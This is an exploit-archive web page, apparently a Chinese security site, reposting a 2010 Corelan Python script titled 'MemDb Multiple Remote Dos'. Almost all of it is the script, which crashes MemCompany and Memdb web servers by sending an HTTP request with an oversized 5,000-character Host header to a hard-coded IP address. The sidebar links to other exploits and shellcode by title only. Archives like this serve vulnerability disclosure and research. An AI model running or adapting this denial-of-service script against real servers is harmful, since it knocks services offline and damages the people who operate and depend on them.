首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MemDb Multiple Remote Dos
来源:http://www.corelan.be:8800 作者:Markot 发布时间:2010-06-29  

#!/usr/bin/python

# Title: MemDb Multiple Remote Dos
# Products: MemCompany v1.0- Memdb Memory Database System v1.02- Memdb Online Survey Sistem v2006
# Date: 28/06/2010
# Author: Markot
# Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-054
# Platform: Windows XP sp3 En
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"

import httplib

payload = "A"*5000
headers = {'Host':payload}
try:
conn = httplib.HTTPConnection("192.168.125.128")
conn.request("GET", "/?page=query'", headers=headers)# MemCompany v1.0
'''conn.request("GET", "/", headers=headers) #use this one for Memdb Online Survey Sistem and
Memdb Memory Database System'''
print "Server Dos'ed"
except:
print "Server unreacheable"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GSM SIM Utility sms file Local
·Winamp v5.571 Malicious AVI De
·Linux/ARM - execve("/bin/sh","
·Mozilla Firefox 3.6.6 Denial o
·Netartmedia iBoutique.MALL SQL
·Linux/ARM - setuid(0) & execve
·UFO: Alien Invasion v2.2.1 Rem
·Linux/ARM - setuid(0) & kill(-
·Free MP3 CD Ripper 1.0 (0day)
·Polymorphic /bin/sh x86 linux
·WarFTPD 1.65 (USER) Remote Buf
·Linux/ARM chmod("/etc/shadow",
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved